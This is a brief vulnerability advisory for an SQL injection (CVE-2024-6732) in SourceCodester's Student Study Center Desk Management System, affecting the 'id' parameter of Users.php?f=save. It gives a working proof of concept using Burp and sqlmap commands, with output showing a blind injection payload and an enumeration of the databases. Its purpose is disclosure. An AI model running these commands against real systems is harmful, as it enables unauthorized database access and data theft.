CVE-2024-6732

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Student Study Center Desk Management System

Affected components: /sscdms/classes/Users.php?f=save

Injection parameter: MULTIPART id

POC

Intercept the request using Burpsuite Proxy.

Save request to save_user.txt.

The vulnerability can be verified with the following command:

sqlmap -r save_user.txt --batch

Parameter: MULTIPART id ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: -----------------------------375499073526017961903522895095
Content-Disposition: form-data; name="id"

Databases can be dumped using the following command:

sqlmap -r save_user.txt --batch --dbs

[10:46:50] [INFO] fetching database names
[10:46:50] [INFO] retrieved: 'information_schema'
[10:46:50] [INFO] retrieved: 'sscdms'
available databases [2]:
[*] information_schema
[*] sscdms

Details​

POC​

Details

POC